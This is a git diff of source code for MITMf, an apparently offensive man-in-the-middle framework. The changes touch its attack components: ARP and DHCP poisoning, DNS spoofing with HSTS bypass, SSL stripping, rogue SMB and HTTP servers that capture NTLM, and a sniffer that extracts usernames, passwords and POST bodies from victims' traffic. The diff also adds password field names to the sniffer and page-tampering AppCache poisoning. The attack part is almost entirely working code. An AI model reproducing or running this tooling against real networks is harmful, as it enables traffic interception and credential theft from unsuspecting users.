other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt) other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, True)
def frag_remover(ack, load):
'''
Keep the FILO OrderedDict of frag loads from getting too large
3 points of limit:
Number of ip_ports < 50
Number of acks per ip:port < 25
Number of chars in load < 5000
'''
global pkt_frag_loads
# Keep the number of IP:port mappings below 50
# last=False pops the oldest item rather than the latest
while len(pkt_frag_loads) > 50:
pkt_frag_loads.popitem(last=False)
# Loop through a deep copy dict but modify the original dict
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
for ip_port in copy_pkt_frag_loads:
if len(copy_pkt_frag_loads[ip_port]) > 0:
# Keep 25 ack:load's per ip:port
while len(copy_pkt_frag_loads[ip_port]) > 25:
pkt_frag_loads[ip_port].popitem(last=False)
# Recopy the new dict to prevent KeyErrors for modifying dict in loop
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
for ip_port in copy_pkt_frag_loads:
# Keep the load less than 75,000 chars
for ack in copy_pkt_frag_loads[ip_port]:
# If load > 5000 chars, just keep the last 200 chars
if len(copy_pkt_frag_loads[ip_port][ack]) > 5000:
pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:]
def frag_joiner(ack, src_ip_port, load):
'''
Keep a store of previous fragments in an OrderedDict named pkt_frag_loads
'''
for ip_port in pkt_frag_loads:
if src_ip_port == ip_port:
if ack in pkt_frag_loads[src_ip_port]:
# Make pkt_frag_loads[src_ip_port][ack] = full load
old_load = pkt_frag_loads[src_ip_port][ack]
concat_load = old_load + load
return OrderedDict([(ack, concat_load)])
return OrderedDict([(ack, load)])
def telnet_logins(src_ip_port, dst_ip_port, load, ack, seq): def telnet_logins(src_ip_port, dst_ip_port, load, ack, seq):
''' '''
@ -530,14 +535,14 @@ def irc_logins(full_load, pkt):
msg = 'IRC pass: %s' % pass_search2.group(1) msg = 'IRC pass: %s' % pass_search2.group(1)
return msg return msg
def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt): def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, verbose):
''' '''
Pull out pertinent info from the parsed HTTP packet data Pull out pertinent info from the parsed HTTP packet data
''' '''
user_passwd = None user_passwd = None
http_url_req = None http_url_req = None
method = None method = None
http_methods = ['GET ', 'POST', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD '] http_methods = ['GET ', 'POST ', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD ']
http_line, header_lines, body = parse_http_load(full_load, http_methods) http_line, header_lines, body = parse_http_load(full_load, http_methods)
headers = headers_to_dict(header_lines) headers = headers_to_dict(header_lines)
if 'host' in headers: if 'host' in headers:
@ -545,44 +550,51 @@ def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt):
else: else:
host = '' host = ''
#if http_line != None: if parsing_pcap is True:
# method, path = parse_http_line(http_line, http_methods)
# http_url_req = get_http_url(method, host, path, headers) if http_line != None:
#if http_url_req != None: method, path = parse_http_line(http_line, http_methods)
#printer(src_ip_port, None, http_url_req) http_url_req = get_http_url(method, host, path, headers)
if http_url_req != None:
if verbose == False:
if len(http_url_req) > 98:
http_url_req = http_url_req[:99] + '...'
printer(src_ip_port, None, http_url_req)
# Print search terms # Print search terms
searched = get_http_searches(http_url_req, body, host) searched = get_http_searches(http_url_req, body, host)
if searched: if searched:
printer(src_ip_port, dst_ip_port, searched) printer(src_ip_port, dst_ip_port, searched)
#We dont need this cause its being taking care of by the proxy # Print user/pwds
if body != '':
#Print user/pwds user_passwd = get_login_pass(body)
#if body != '': if user_passwd != None:
# user_passwd = get_login_pass(body) try:
# if user_passwd != None: http_user = user_passwd[0].decode('utf8')
# try: http_pass = user_passwd[1].decode('utf8')
# http_user = user_passwd[0].decode('utf8') # Set a limit on how long they can be prevent false+
# http_pass = user_passwd[1].decode('utf8') if len(http_user) > 75 or len(http_pass) > 75:
# # Set a limit on how long they can be prevent false+ return
# if len(http_user) > 75 or len(http_pass) > 75: user_msg = 'HTTP username: %s' % http_user
# return printer(src_ip_port, dst_ip_port, user_msg)
# user_msg = 'HTTP username: %s' % http_user pass_msg = 'HTTP password: %s' % http_pass
# printer(src_ip_port, dst_ip_port, user_msg) printer(src_ip_port, dst_ip_port, pass_msg)
# pass_msg = 'HTTP password: %s' % http_pass except UnicodeDecodeError:
# printer(src_ip_port, dst_ip_port, pass_msg) pass
# except UnicodeDecodeError:
# pass
# Print POST loads # Print POST loads
# ocsp is a common SSL post load that's never interesting # ocsp is a common SSL post load that's never interesting
#if method == 'POST' and 'ocsp.' not in host: if method == 'POST' and 'ocsp.' not in host:
# try: try:
# msg = 'POST load: %s' % body.encode('utf8') if verbose == False and len(body) > 99:
# printer(src_ip_port, None, msg) # If it can't decode to utf8 we're probably not interested in it
# except UnicodeDecodeError: msg = 'POST load: %s...' % body[:99].encode('utf8')
# pass else:
msg = 'POST load: %s' % body.encode('utf8')
printer(src_ip_port, None, msg)
except UnicodeDecodeError:
pass
# Kerberos over TCP # Kerberos over TCP
decoded = Decode_Ip_Packet(str(pkt)[14:]) decoded = Decode_Ip_Packet(str(pkt)[14:])
@ -662,7 +674,10 @@ def parse_basic_auth(src_ip_port, dst_ip_port, headers, authorization_header):
b64_auth_re = re.match('basic (.+)', header_val, re.IGNORECASE) b64_auth_re = re.match('basic (.+)', header_val, re.IGNORECASE)
if b64_auth_re != None: if b64_auth_re != None:
basic_auth_b64 = b64_auth_re.group(1) basic_auth_b64 = b64_auth_re.group(1)
try:
basic_auth_creds = base64.decodestring(basic_auth_b64) basic_auth_creds = base64.decodestring(basic_auth_b64)
except Exception:
return
msg = 'Basic Authentication: %s' % basic_auth_creds msg = 'Basic Authentication: %s' % basic_auth_creds
printer(src_ip_port, dst_ip_port, msg) printer(src_ip_port, dst_ip_port, msg)
@ -713,15 +728,13 @@ def headers_to_dict(header_lines):
Convert the list of header lines into a dictionary Convert the list of header lines into a dictionary
''' '''
headers = {} headers = {}
# Incomprehensible list comprehension flattens list of headers for line in header_lines:
# that are each split at ': ' lineList=line.split(': ', 1)
# http://stackoverflow.com/a/406296 key=lineList[0].lower()
headers_list = [x for line in header_lines for x in line.split(': ', 1)] if len(lineList)>1:
headers_dict = dict(zip(headers_list[0::2], headers_list[1::2])) headers[key]=lineList[1]
# Make the header key (like "Content-Length") lowercase else:
for header in headers_dict: headers[key]=""
headers[header.lower()] = headers_dict[header]
return headers return headers
def parse_http_line(http_line, http_methods): def parse_http_line(http_line, http_methods):
@ -794,9 +807,12 @@ def parse_netntlm_chal(headers, chal_header, ack):
header_val2 = header_val2.split(' ', 1) header_val2 = header_val2.split(' ', 1)
# The header value can either start with NTLM or Negotiate # The header value can either start with NTLM or Negotiate
if header_val2[0] == 'NTLM' or header_val2[0] == 'Negotiate': if header_val2[0] == 'NTLM' or header_val2[0] == 'Negotiate':
try:
msg2 = header_val2[1] msg2 = header_val2[1]
except IndexError:
return
msg2 = base64.decodestring(msg2) msg2 = base64.decodestring(msg2)
parse_ntlm_chal(ack, msg2) parse_ntlm_chal(msg2, ack)
def parse_ntlm_chal(msg2, ack): def parse_ntlm_chal(msg2, ack):
''' '''
@ -885,10 +901,10 @@ def get_login_pass(body):
'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname', 'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname',
'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename', 'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename',
'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username', 'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username',
'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in'] 'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in', 'usuario']
passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword', passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword',
'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password' 'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password'
'passwort', 'passwrd', 'wppassword', 'upasswd'] 'passwort', 'passwrd', 'wppassword', 'upasswd','senha','contrasena']
for login in userfields: for login in userfields:
login_re = re.search('(%s=[^&]+)' % login, body, re.IGNORECASE) login_re = re.search('(%s=[^&]+)' % login, body, re.IGNORECASE)


@ -1,5 +1,3 @@
import threading
from core.utils import set_ip_forwarding, iptables from core.utils import set_ip_forwarding, iptables
from core.logger import logger from core.logger import logger
from scapy.all import * from scapy.all import *
@ -19,21 +17,20 @@ class PacketFilter:
iptables().NFQUEUE() iptables().NFQUEUE()
self.nfqueue = NetfilterQueue() self.nfqueue = NetfilterQueue()
self.nfqueue.bind(1, self.modify) self.nfqueue.bind(0, self.modify)
t = threading.Thread(name='packetparser', target=self.nfqueue.run) self.nfqueue.run()
t.setDaemon(True)
t.start()
def modify(self, pkt): def modify(self, pkt):
#log.debug("Got packet") #log.debug("Got packet")
data = pkt.get_payload() data = pkt.get_payload()
packet = IP(data) packet = IP(data)
for filter in self.filter:
try: try:
execfile(self.filter) execfile(filter)
except Exception: except Exception:
log.debug("Error occurred in filter") log.debug("Error occurred in filter", filter)
print_exc() print_exc()
pkt.set_payload(str(packet)) #set the packet content to our modified version pkt.set_payload(str(packet)) #set the packet content to our modified version


@ -214,8 +214,8 @@ class ARPpoisoner:
if targetmac is not None: if targetmac is not None:
try: try:
#log.debug("Poisoning {} <-> {}".format(targetip, self.gatewayip)) #log.debug("Poisoning {} <-> {}".format(targetip, self.gatewayip))
self.s.send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op=arpmode)) self.s2.send(Ether(src=self.mymac, dst=targetmac)/ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op=arpmode))
self.s.send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op=arpmode)) self.s2.send(Ether(src=self.mymac, dst=self.gatewaymac)/ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op=arpmode))
except Exception as e: except Exception as e:
if "Interrupted system call" not in e: if "Interrupted system call" not in e:
log.error("Exception occurred while poisoning {}: {}".format(targetip, e)) log.error("Exception occurred while poisoning {}: {}".format(targetip, e))
@ -242,8 +242,8 @@ class ARPpoisoner:
log.info("Restoring connection {} <-> {} with {} packets per host".format(targetip, self.gatewayip, count)) log.info("Restoring connection {} <-> {} with {} packets per host".format(targetip, self.gatewayip, count))
try: try:
for i in range(0, count): for i in range(0, count):
self.s.send(ARP(op="is-at", pdst=self.gatewayip, psrc=targetip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac)) self.s2.send(Ether(src=targetmac, dst='ff:ff:ff:ff:ff:ff')/ARP(op="is-at", pdst=self.gatewayip, psrc=targetip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac))
self.s.send(ARP(op="is-at", pdst=targetip, psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac)) self.s2.send(Ether(src=self.gatewaymac, dst='ff:ff:ff:ff:ff:ff')/ARP(op="is-at", pdst=targetip, psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac))
except Exception as e: except Exception as e:
if "Interrupted system call" not in e: if "Interrupted system call" not in e:
log.error("Exception occurred while poisoning {}: {}".format(targetip, e)) log.error("Exception occurred while poisoning {}: {}".format(targetip, e))


@ -79,7 +79,7 @@ class DHCPpoisoner():
return 'stored', client_ip return 'stored', client_ip
net = IPNetwork(self.ip_address + '/24') net = IPNetwork(self.ip_address + '/24')
return 'generated', random.choice(list(net)) return 'generated', str(random.choice(list(net)))
def dhcp_callback(self, resp): def dhcp_callback(self, resp):
if resp.haslayer(DHCP): if resp.haslayer(DHCP):


@ -82,7 +82,10 @@ class ProxyPlugins:
self.plugin_list.remove(p) self.plugin_list.remove(p)
log.debug("Removing {} plugin".format(p.name)) log.debug("Removing {} plugin".format(p.name))
for mthd,pmthd in self.mthdDict.iteritems(): for mthd,pmthd in self.mthdDict.iteritems():
self.plugin_mthds[mthd].remove(p) try:
self.plugin_mthds[mthd].remove(getattr(p,pmthd))
except KeyError:
pass #nothing to remove
def hook(self): def hook(self):
'''Magic to hook various function calls in sslstrip''' '''Magic to hook various function calls in sslstrip'''
@ -108,6 +111,7 @@ class ProxyPlugins:
log.debug("hooking {}()".format(fname)) log.debug("hooking {}()".format(fname))
#calls any plugin that has this hook #calls any plugin that has this hook
try: try:
if self.plugin_mthds:
for f in self.plugin_mthds[fname]: for f in self.plugin_mthds[fname]:
a = f(**args) a = f(**args)
if a != None: args = a if a != None: args = a


@ -48,6 +48,12 @@ from IPy import IP
formatter = logging.Formatter("%(asctime)s %(clientip)s [DNS] %(message)s", datefmt="%Y-%m-%d %H:%M:%S") formatter = logging.Formatter("%(asctime)s %(clientip)s [DNS] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("DNSChef", formatter) log = logger().setup_logger("DNSChef", formatter)
dnslog = logging.getLogger('dnslog')
handler = logging.FileHandler('./logs/dns/dns.log',)
handler.setFormatter(formatter)
dnslog.addHandler(handler)
dnslog.setLevel(logging.INFO)
# DNSHandler Mixin. The class contains generic functions to parse DNS requests and # DNSHandler Mixin. The class contains generic functions to parse DNS requests and
# calculate an appropriate response based on user parameters. # calculate an appropriate response based on user parameters.
class DNSHandler(): class DNSHandler():
@ -69,6 +75,7 @@ class DNSHandler():
except Exception as e: except Exception as e:
log.info("Error: invalid DNS request", extra=clientip) log.info("Error: invalid DNS request", extra=clientip)
dnslog.info("Error: invalid DNS request", extra=clientip)
else: else:
# Only Process DNS Queries # Only Process DNS Queries
@ -113,6 +120,7 @@ class DNSHandler():
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q) response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
log.info("Cooking the response of type '{}' for {} to {}".format(qtype, qname, fake_record), extra=clientip) log.info("Cooking the response of type '{}' for {} to {}".format(qtype, qname, fake_record), extra=clientip)
dnslog.info("Cooking the response of type '{}' for {} to {}".format(qtype, qname, fake_record), extra=clientip)
# IPv6 needs additional work before inclusion: # IPv6 needs additional work before inclusion:
if qtype == "AAAA": if qtype == "AAAA":
@ -182,6 +190,7 @@ class DNSHandler():
elif qtype == "*" and not None in fake_records.values(): elif qtype == "*" and not None in fake_records.values():
log.info("Cooking the response of type '{}' for {} with {}".format("ANY", qname, "all known fake records."), extra=clientip) log.info("Cooking the response of type '{}' for {} with {}".format("ANY", qname, "all known fake records."), extra=clientip)
dnslog.info("Cooking the response of type '{}' for {} with {}".format("ANY", qname, "all known fake records."), extra=clientip)
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap,qr=1, aa=1, ra=1), q=d.q) response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap,qr=1, aa=1, ra=1), q=d.q)
@ -257,6 +266,7 @@ class DNSHandler():
# Proxy the request # Proxy the request
else: else:
log.debug("Proxying the response of type '{}' for {}".format(qtype, qname), extra=clientip) log.debug("Proxying the response of type '{}' for {}".format(qtype, qname), extra=clientip)
dnslog.info("Proxying the response of type '{}' for {}".format(qtype, qname), extra=clientip)
nameserver_tuple = random.choice(nameservers).split('#') nameserver_tuple = random.choice(nameservers).split('#')
response = self.proxyrequest(data, *nameserver_tuple) response = self.proxyrequest(data, *nameserver_tuple)
@ -339,6 +349,7 @@ class DNSHandler():
except Exception as e: except Exception as e:
log.warning("Could not proxy request: {}".format(e), extra=clientip) log.warning("Could not proxy request: {}".format(e), extra=clientip)
dnslog.info("Could not proxy request: {}".format(e), extra=clientip)
else: else:
return reply return reply
@ -346,6 +357,7 @@ class DNSHandler():
clientip = {'clientip': self.client_address[0]} clientip = {'clientip': self.client_address[0]}
log.info("Resolving '{}' to '{}' for HSTS bypass".format(fake_domain, real_domain), extra=clientip) log.info("Resolving '{}' to '{}' for HSTS bypass".format(fake_domain, real_domain), extra=clientip)
dnslog.info("Resolving '{}' to '{}' for HSTS bypass".format(fake_domain, real_domain), extra=clientip)
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q) response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
@ -354,6 +366,7 @@ class DNSHandler():
#First proxy the request with the real domain #First proxy the request with the real domain
q = DNSRecord.question(real_domain).pack() q = DNSRecord.question(real_domain).pack()
r = self.proxyrequest(q, *nameserver_tuple) r = self.proxyrequest(q, *nameserver_tuple)
if r is None: return None
#Parse the answer #Parse the answer
dns_rr = DNSRecord.parse(r).rr dns_rr = DNSRecord.parse(r).rr
@ -449,7 +462,12 @@ class DNSChef(ConfigWatcher):
# Use alternative DNS servers # Use alternative DNS servers
if config['nameservers']: if config['nameservers']:
self.nameservers = config['nameservers'].split(',') self.nameservers = []
if type(config['nameservers']) is str:
self.nameservers.append(config['nameservers'])
elif type(config['nameservers']) is list:
self.nameservers = config['nameservers']
for section in config.sections: for section in config.sections:


@ -49,10 +49,10 @@ class HTTP:
def start(self): def start(self):
try: try:
if OsInterfaceIsSupported(): #if OsInterfaceIsSupported():
server = ThreadingTCPServer((settings.Config.Bind_To, 80), HTTP1) #server = ThreadingTCPServer((settings.Config.Bind_To, 80), HTTP1)
else: #else:
server = ThreadingTCPServer(('', 80), HTTP1) server = ThreadingTCPServer(('0.0.0.0', 80), HTTP1)
t = threading.Thread(name='HTTP', target=server.serve_forever) t = threading.Thread(name='HTTP', target=server.serve_forever)
t.setDaemon(True) t.setDaemon(True)
@ -267,7 +267,7 @@ def PacketSequence(data, client):
else: else:
Response = IIS_Auth_401_Ans() Response = IIS_Auth_401_Ans()
if settings.Config.Verbose: if settings.Config.Verbose:
log.info("{} [HTTP] Sending NTLM authentication request to".format(client)) log.info("{} [HTTP] Sending NTLM authentication request".format(client))
return str(Response) return str(Response)


@ -28,12 +28,12 @@ class SMB:
def start(self): def start(self):
try: try:
if OsInterfaceIsSupported(): #if OsInterfaceIsSupported():
server1 = ThreadingTCPServer((settings.Config.Bind_To, 445), SMB1) # server1 = ThreadingTCPServer((settings.Config.Bind_To, 445), SMB1)
server2 = ThreadingTCPServer((settings.Config.Bind_To, 139), SMB1) # server2 = ThreadingTCPServer((settings.Config.Bind_To, 139), SMB1)
else: #else:
server1 = ThreadingTCPServer(('', 445), SMB1) server1 = ThreadingTCPServer(('0.0.0.0', 445), SMB1)
server2 = ThreadingTCPServer(('', 139), SMB1) server2 = ThreadingTCPServer(('0.0.0.0', 139), SMB1)
for server in [server1, server2]: for server in [server1, server2]:
t = threading.Thread(name='SMB', target=server.serve_forever) t = threading.Thread(name='SMB', target=server.serve_forever)


@ -155,7 +155,7 @@ class ServerConnection(HTTPClient):
self.isCompressed = True self.isCompressed = True
elif (key.lower()== 'strict-transport-security'): elif (key.lower()== 'strict-transport-security'):
clientlog.info("Zapped a strict-trasport-security header", extra=self.clientInfo) clientlog.info("Zapped a strict-transport-security header", extra=self.clientInfo)
elif (key.lower() == 'content-length'): elif (key.lower() == 'content-length'):
self.contentLength = value self.contentLength = value
@ -179,7 +179,7 @@ class ServerConnection(HTTPClient):
self.plugins.hook() self.plugins.hook()
if logging.getLevelName(log.getEffectiveLevel()) == "DEBUG": if logging.getLevelName(log.getEffectiveLevel()) == "DEBUG":
for header, value in self.client.headers.iteritems(): for header, value in self.headers.iteritems():
log.debug("Receiving header: ({}: {})".format(header, value)) log.debug("Receiving header: ({}: {})".format(header, value))
def handleResponsePart(self, data): def handleResponsePart(self, data):


@ -98,5 +98,5 @@ class iptables:
def NFQUEUE(self): def NFQUEUE(self):
log.debug("Setting iptables NFQUEUE rule") log.debug("Setting iptables NFQUEUE rule")
os.system('iptables -t nat -A PREROUTING -j NFQUEUE --queue-num 1') os.system('iptables -I FORWARD -j NFQUEUE --queue-num 0')
self.nfqueue = True self.nfqueue = True

@ -1 +1 @@
Subproject commit dadf1d21bfcb9c8ebefc7891bd95b9452b2af8d5 Subproject commit d2f352139f23ed642fa174211eddefb95e6a8586

2
logs/.gitignore vendored

@ -1,5 +1,5 @@
* *
!.gitignore !.gitignore
!responder/ !responder/
!dnschef/ !dns/
!ferret-ng/ !ferret-ng/

130
mitmf.py

@ -41,7 +41,7 @@ mitmf_version = '0.9.8'
mitmf_codename = 'The Dark Side' mitmf_codename = 'The Dark Side'
if os.geteuid() != 0: if os.geteuid() != 0:
sys.exit("[-] The derp is strong with this one") sys.exit("[-] The derp is strong with this one\nTIP: you may run MITMf as root.")
parser = argparse.ArgumentParser(description="MITMf v{} - '{}'".format(mitmf_version, mitmf_codename), parser = argparse.ArgumentParser(description="MITMf v{} - '{}'".format(mitmf_version, mitmf_codename),
version="{} - '{}'".format(mitmf_version, mitmf_codename), version="{} - '{}'".format(mitmf_version, mitmf_codename),
@ -52,14 +52,14 @@ parser = argparse.ArgumentParser(description="MITMf v{} - '{}'".format(mitmf_ver
#add MITMf options #add MITMf options
sgroup = parser.add_argument_group("MITMf", "Options for MITMf") sgroup = parser.add_argument_group("MITMf", "Options for MITMf")
sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]") sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
sgroup.add_argument("-i", dest='interface', type=str, help="Interface to listen on") sgroup.add_argument("-i", dest='interface', required=True, type=str, help="Interface to listen on")
sgroup.add_argument("-c", dest='configfile', metavar="CONFIG_FILE", type=str, default="./config/mitmf.conf", help="Specify config file to use") sgroup.add_argument("-c", dest='configfile', metavar="CONFIG_FILE", type=str, default="./config/mitmf.conf", help="Specify config file to use")
sgroup.add_argument("-p", "--preserve-cache", action="store_true", help="Don't kill client/server caching") sgroup.add_argument("-p", "--preserve-cache", action="store_true", help="Don't kill client/server caching")
sgroup.add_argument("-r", '--read-pcap', type=str, help='Parse specified pcap for credentials and exit') sgroup.add_argument("-r", '--read-pcap', type=str, help='Parse specified pcap for credentials and exit')
sgroup.add_argument("-l", dest='listen_port', type=int, metavar="PORT", default=10000, help="Port to listen on (default 10000)") sgroup.add_argument("-l", dest='listen_port', type=int, metavar="PORT", default=10000, help="Port to listen on (default 10000)")
sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.") sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.") sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
sgroup.add_argument("-F", "--filter", type=str, help='Filter to apply to incoming traffic') sgroup.add_argument("-F", "--filter", type=str, help='Filter to apply to incoming traffic', nargs='+')
#Initialize plugins and pass them the parser NameSpace object #Initialize plugins and pass them the parser NameSpace object
plugins = [plugin(parser) for plugin in plugin.Plugin.__subclasses__()] plugins = [plugin(parser) for plugin in plugin.Plugin.__subclasses__()]
@ -73,6 +73,15 @@ options = parser.parse_args()
#Set the log level #Set the log level
logger().log_level = logging.__dict__[options.log_level.upper()] logger().log_level = logging.__dict__[options.log_level.upper()]
from core.logger import logger
+formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
+log = logger().setup_logger("MITMf", formatter)
+from core.netcreds import NetCreds
+if options.read_pcap:
+NetCreds().parse_pcap(options.read_pcap)
 #Check to see if we supplied a valid interface, pass the IP and MAC to the NameSpace object
 from core.utils import get_ip, get_mac, shutdown
 options.ip = get_ip(options.interface)
@@ -80,33 +89,18 @@ options.mac = get_mac(options.interface)
 settings.Config.populate(options)
-from core.logger import logger
-formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
-log = logger().setup_logger("MITMf", formatter)
 log.debug("MITMf started: {}".format(sys.argv))
 #Start Net-Creds
-from core.netcreds import NetCreds
-NetCreds().start(options.interface, options.ip, options.read_pcap)
+print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename)
+NetCreds().start(options.interface, options.ip)
+print "|"
+print "|_ Net-Creds v{} online".format(NetCreds.version)
-from core.sslstrip.CookieCleaner import CookieCleaner
 from core.proxyplugins import ProxyPlugins
-from core.sslstrip.StrippingProxy import StrippingProxy
-from core.sslstrip.URLMonitor import URLMonitor
-URLMonitor.getInstance().setFaviconSpoofing(options.favicon)
-URLMonitor.getInstance().setCaching(options.preserve_cache)
-CookieCleaner.getInstance().setEnabled(options.killsessions)
-strippingFactory = http.HTTPFactory(timeout=10)
-strippingFactory.protocol = StrippingProxy
-reactor.listenTCP(options.listen_port, strippingFactory)
 ProxyPlugins().all_plugins = plugins
-print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename)
 for plugin in plugins:
 #load only the plugins that have been called at the command line
@@ -126,48 +120,64 @@ for plugin in plugins:
 for line in xrange(0, len(plugin.tree_info)):
 print "| |_ {}".format(plugin.tree_info.pop())
-plugin.reactor(strippingFactory)
 plugin.start_config_watch()
-print "|"
-print "|_ Sergio-Proxy v0.2.1 online"
-print "|_ SSLstrip v0.9 by Moxie Marlinspike online"
-print "|"
 if options.filter:
 from core.packetfilter import PacketFilter
 pfilter = PacketFilter(options.filter)
-pfilter.start()
 print "|_ PacketFilter online"
-print "| |_ Applying filter {} to incoming packets".format(options.filter)
-print "|_ Net-Creds v{} online".format(NetCreds.version)
-#Start mitmf-api
-from core.mitmfapi import mitmfapi
-print "|_ MITMf-API online"
-mitmfapi().start()
-#Start the HTTP Server
-from core.servers.HTTP import HTTP
-HTTP().start()
-print "|_ HTTP server online"
-#Start DNSChef
-from core.servers.DNS import DNSChef
-DNSChef().start()
-print "|_ DNSChef v{} online".format(DNSChef.version)
-#Start the SMB server
-from core.servers.SMB import SMB
-SMB().start()
-print "|_ SMB server online\n"
-#start the reactor
-reactor.run()
-print "\n"
-if options.filter:
+for filter in options.filter:
+print " |_ Applying filter {} to incoming packets".format(filter)
+try:
+pfilter.start()
+except KeyboardInterrupt:
 pfilter.stop()
-shutdown()
+shutdown()
+else:
+from core.sslstrip.CookieCleaner import CookieCleaner
+from core.sslstrip.StrippingProxy import StrippingProxy
+from core.sslstrip.URLMonitor import URLMonitor
+URLMonitor.getInstance().setFaviconSpoofing(options.favicon)
+URLMonitor.getInstance().setCaching(options.preserve_cache)
+CookieCleaner.getInstance().setEnabled(options.killsessions)
+strippingFactory = http.HTTPFactory(timeout=10)
+strippingFactory.protocol = StrippingProxy
+reactor.listenTCP(options.listen_port, strippingFactory)
+for plugin in plugins:
+if vars(options)[plugin.optname] is True:
+plugin.reactor(strippingFactory)
+print "|_ Sergio-Proxy v0.2.1 online"
+print "|_ SSLstrip v0.9 by Moxie Marlinspike online"
+#Start mitmf-api
+from core.mitmfapi import mitmfapi
+print "|"
+print "|_ MITMf-API online"
+mitmfapi().start()
+#Start the HTTP Server
+from core.servers.HTTP import HTTP
+HTTP().start()
+print "|_ HTTP server online"
+#Start DNSChef
+from core.servers.DNS import DNSChef
+DNSChef().start()
+print "|_ DNSChef v{} online".format(DNSChef.version)
+#Start the SMB server
+from core.servers.SMB import SMB
+SMB().start()
+print "|_ SMB server online\n"
+#start the reactor
+reactor.run()
+print "\n"
+shutdown()
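In the restructured startup above, pcap parsing is split out of NetCreds.start(), and the SSLstrip proxy plus the built-in HTTP/DNS/SMB servers only come up when no packet filter was requested. A minimal sketch of the two NetCreds entry points after this change (interface, IP and pcap path are placeholder values, not taken from the diff):

```
# Sketch only: how the two NetCreds entry points are called after this change.
from core.netcreds import NetCreds

# Offline mode: --read-pcap is now handled by parse_pcap() before startup
NetCreds().parse_pcap('./capture.pcap')      # hypothetical pcap path

# Live mode: start() no longer takes the pcap argument
NetCreds().start('eth0', '192.168.1.5')      # hypothetical interface and IP
```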


@@ -36,6 +36,7 @@ class AppCachePlugin(Plugin):
 from core.sslstrip.URLMonitor import URLMonitor
 self.urlMonitor = URLMonitor.getInstance()
+self.urlMonitor.caching = True
 self.urlMonitor.setAppCachePoisoning()
 def response(self, response, request, data):
@@ -72,29 +73,25 @@ class AppCachePlugin(Plugin):
 p = self.getTemplatePrefix(section)
 self.clientlog.info("Poisoning raw URL", extra=request.clientInfo)
 if os.path.exists(p + '.replace'): # replace whole content
-f = open(p + '.replace', 'r')
+with open(p + '.replace', 'r') as f:
 data = f.read()
-f.close()
 elif os.path.exists(p + '.append'): # append file to body
-f = open(p + '.append', 'r')
+with open(p + '.append', 'r') as f:
 data += f.read()
-f.close()
 elif (section.get('tamper_url',False) == url) or (section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url)):
 self.clientlog.info("Found URL in section '{}'!".format(name), extra=request.clientInfo)
 p = self.getTemplatePrefix(section)
 self.clientlog.info("Poisoning URL with tamper template: {}".format(p), extra=request.clientInfo)
 if os.path.exists(p + '.replace'): # replace whole content
-f = open(p + '.replace', 'r')
+with open(p + '.replace', 'r') as f:
 data = f.read()
-f.close()
 elif os.path.exists(p + '.append'): # append file to body
-f = open(p + '.append', 'r')
+with open(p + '.append', 'r') as f:
 appendix = f.read()
-data = re.sub(re.compile("</body>",re.IGNORECASE), appendix + "</body>", data) #append to body
